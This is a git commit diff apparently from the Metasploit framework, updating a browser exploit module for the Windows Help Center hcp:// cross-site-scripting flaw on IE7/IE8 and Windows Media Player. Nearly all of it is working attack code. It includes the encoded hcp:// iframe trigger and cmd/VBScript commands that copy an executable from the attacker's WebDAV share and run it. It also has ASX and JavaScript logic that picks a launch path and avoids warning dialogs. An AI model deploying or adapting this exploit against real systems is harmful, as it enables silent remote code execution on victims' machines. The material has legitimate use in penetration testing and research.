Bug fixes for WMP11 and IE8, new configurable setting for exploit trigger, and output cleanup.
git-svn-id: file:///home/svn/framework3/trunk@9495 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
33212ae5ba
commit
7cbc566c7b
|
@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::CmdStagerVBS
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -32,11 +31,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
scripting vulnerability and a specialized mechanism to launch the XSS trigger,
|
||||
arbitrary command execution can be achieved.
|
||||
|
||||
On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
|
||||
box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
|
||||
If IE8 and WMP11, a dialog box will ask the user if execution should continue.
|
||||
Automatic detection of these options is implemented in this module, and will
|
||||
default to not sending the exploit for IE8/WMP11 unless the option is overridden.
|
||||
On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it
|
||||
can be used to launch the exploit automatically. If IE8 and WMP11, either can
|
||||
be used to launch the attack, but both pop dialog boxes asking the user if
|
||||
execution should continue. This exploit detects if non-intrusive mechanisms are
|
||||
available and will use one if possible. In the case of both IE8 and WMP11, the
|
||||
exploit defaults to using an iframe on IE8, but is configurable by setting the
|
||||
DIALOGMECH option to "none" or "player".
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -63,20 +64,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ], # Only automatic for now.
|
||||
#[ 'IE6/IE7', { 'trigger_method' => 'iframe' } ], # Only tested IE7 / XP SP2,3
|
||||
#[ 'IE8/WMP9', { 'trigger_method' => 'asx' } ], # untested
|
||||
#[ 'IE8/WMP11', { 'trigger_method' => 'asx' } ], # tested, pops dialog box
|
||||
[ 'Automatic', { } ]
|
||||
],
|
||||
'DisclosureDate' => 'June 09, 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
#OptString.new( 'CMD', [ true, "The URI-encoded command to execute.", "calc.exe" ]),
|
||||
OptBool.new( 'RUNWITHDIALOG', [ true, "Proceed with exploit even if it will pop a dialog to the user?", false]),
|
||||
OptPort.new( 'SRVPORT', [ true, "The daemon port to listen on", 80 ]),
|
||||
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ])
|
||||
OptString.new( 'URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
OptString.new( 'DIALOGMECH', [ true, "IE8/WMP11 trigger mechanism (none, iframe, or player).", "iframe"])
|
||||
], self.class)
|
||||
|
||||
deregister_options('SSL', 'SSLVersion') # Just for now
|
||||
|
@ -112,16 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def process_get(cli, request)
|
||||
|
||||
#print_status("Responding to GET request from #{cli.peerhost}:#{cli.peerport}")
|
||||
|
||||
@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
|
||||
webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
|
||||
|
||||
@url_base = "http://" + @my_host
|
||||
|
||||
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
|
||||
print_status "GET for payload received."
|
||||
print_status "Sending payload executable to target ..."
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
|
||||
|
@ -130,20 +123,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
if request.uri.match(/\.gif$/)
|
||||
# "world's smallest gif"
|
||||
data = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00!\xF9\x04\x01"
|
||||
data += "\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
|
||||
print_status "Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ..."
|
||||
send_response(cli, data, { 'Content-TYpe' => 'image/gif' } )
|
||||
end
|
||||
|
||||
# ASX Request Inbound
|
||||
if request.uri.match(/\.asx$/)
|
||||
asx = %Q|<ASX VERSION="3.0">
|
||||
<PARAM name="HTMLView" value="URLBASE/STARTHELP"/>
|
||||
<ENTRY>
|
||||
<REF href=""/>
|
||||
<REF href="URLBASE/IMGFILE"/>
|
||||
</ENTRY>
|
||||
</ASX>
|
||||
|
|
||||
#<REF href="http://www.metasploit.com/images/icbm.jpg"/>
|
||||
asx.gsub!(/URLBASE/, @url_base)
|
||||
asx.gsub!(/STARTHELP/, @random_dir + "/" + @start_help)
|
||||
print_status("ASX file requested. Responding to #{cli.peerhost}:#{cli.peerport}...")
|
||||
asx.gsub!(/IMGFILE/, @random_dir + "/" + @img_file)
|
||||
print_status("Sending asx file to #{cli.peerhost}:#{cli.peerport} ...")
|
||||
send_response(cli, asx, { 'Content-Type' => 'text/html' })
|
||||
return
|
||||
end
|
||||
|
@ -152,12 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if request.uri.match(/#{@start_help}/)
|
||||
|
||||
help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
|
||||
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E">|
|
||||
#help_html = %Q|<iframe src="hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27TASKKILL%27%29%29%3C/script%3E">|
|
||||
# stolen from Rex::Text, modified to return fromCharCode happy numbers
|
||||
|
||||
rand_vbs = rand_text_alpha(rand(2)+1) + ".vbs"
|
||||
task_cmd = "taskkill /F /IM helpctr.exe"
|
||||
copy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\#{@payload}^
|
||||
vbs_content = %Q|WScript.CreateObject("WScript.Shell").Run "#{copy_launch}",0,false|
|
||||
write_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}|
|
||||
|
@ -165,11 +161,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
concat_cmds = "#{write_vbs}|#{launch_vbs}"
|
||||
|
||||
eval_block = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));"
|
||||
task_kill = "alert(\"foo\");"#"Run(String.fromCharCode(#{convert_to_char_code(task_cmd)}));"
|
||||
eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))
|
||||
help_html.gsub!(/COMMANDS/, eval_block)
|
||||
#help_html.gsub!(/TASKKILL/, task_kill)
|
||||
print_status("Responding to request for exploit iframe at #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...")
|
||||
send_response(cli, help_html, { 'Content-Type' => 'text/html' })
|
||||
return
|
||||
end
|
||||
|
@ -196,33 +190,23 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
|
|||
|
||||
// if ie8, check WMP version
|
||||
if (ver > 7) {
|
||||
//alert("IE8 detected. Checking WMP version.");
|
||||
var o = document.createElement("OBJECT");
|
||||
o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
|
||||
o.setAttribute("uiMode", "invisible");
|
||||
// if wmp9
|
||||
// if wmp9, go ahead and launch
|
||||
if( parseInt(o.versionInfo) < 10 ) {
|
||||
//alert("WMP9 or below detected. Launching exploit.");
|
||||
o.openPlayer(asx);
|
||||
// if > wmp9, but overridden via dialog
|
||||
// if > wmp9, only launch if user requests
|
||||
} else {
|
||||
if( RUNWITHDIALOG ) {
|
||||
//alert(">WMP9 detected but launching anyway.");
|
||||
o.openPlayer(asx)
|
||||
} else { //alert("IE8 with > WMP9 detected. Will not launch exploit.");
|
||||
DIALOGMECH
|
||||
}
|
||||
}
|
||||
// if ie6 or 7, use iframe
|
||||
} else {
|
||||
//alert("< IE8 detected. Launching via iframe.")
|
||||
// if ie7, use iframe
|
||||
} else {
|
||||
launchiframe(ifr);
|
||||
}
|
||||
}
|
||||
} else {
|
||||
//alert("Non-IE detected. Launching via iframe.");
|
||||
// if other, try iframe
|
||||
var o = document.createElement("IFRAME");
|
||||
o.setAttribute("src", ifr);
|
||||
document.body.appendChild(o);
|
||||
launchiframe(ifr);
|
||||
}
|
||||
|
|
||||
|
||||
|
@ -232,17 +216,31 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
|
|||
</body>
|
||||
</html>
|
||||
|
|
||||
case datastore['DIALOGMECH']
|
||||
when "player"
|
||||
mech = "o.openPlayer(asx);"
|
||||
when "iframe"
|
||||
mech = "launchiframe(ifr);"
|
||||
when "none"
|
||||
mech = ""
|
||||
else
|
||||
mech = ""
|
||||
end
|
||||
|
||||
html.gsub!(/JAVASCRIPTFU/, js)
|
||||
html.gsub!(/DIALOGMECH/, mech)
|
||||
html.gsub!(/URLBASE/, @url_base)
|
||||
html.gsub!(/ASXFILE/, @random_dir + "/" + @asx_file)
|
||||
html.gsub!(/IFRFILE/, @random_dir + "/" + @start_help)
|
||||
|
||||
datastore['RUNWITHDIALOG'] ? override = "true" : override = "false"
|
||||
html.gsub!(/RUNWITHDIALOG/, override)
|
||||
print_status("Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...")
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
headers = {
|
||||
'Content-Type' => 'text/html',
|
||||
#'X-UA-Compatible' => 'IE=7'
|
||||
}
|
||||
|
||||
send_response(cli, html, headers)
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -324,7 +322,6 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
|
|||
print_status("Sending 404 for #{path} ...")
|
||||
send_not_found(cli)
|
||||
return
|
||||
|
||||
end
|
||||
|
||||
# send the response
|
||||
|
@ -339,6 +336,7 @@ if (window.navigator.appName == "Microsoft Internet Explorer") {
|
|||
@asx_file = rand_text_alpha(rand(2)+1) + ".asx"
|
||||
@start_help = rand_text_alpha(rand(2)+1) + ".html"
|
||||
@payload = rand_text_alpha(rand(2)+1) + ".exe"
|
||||
@img_file = rand_text_alpha(rand(2)+1) + ".gif"
|
||||
|
||||
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
|
||||
raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
|
||||
|
|
Loading…
Reference in New Issue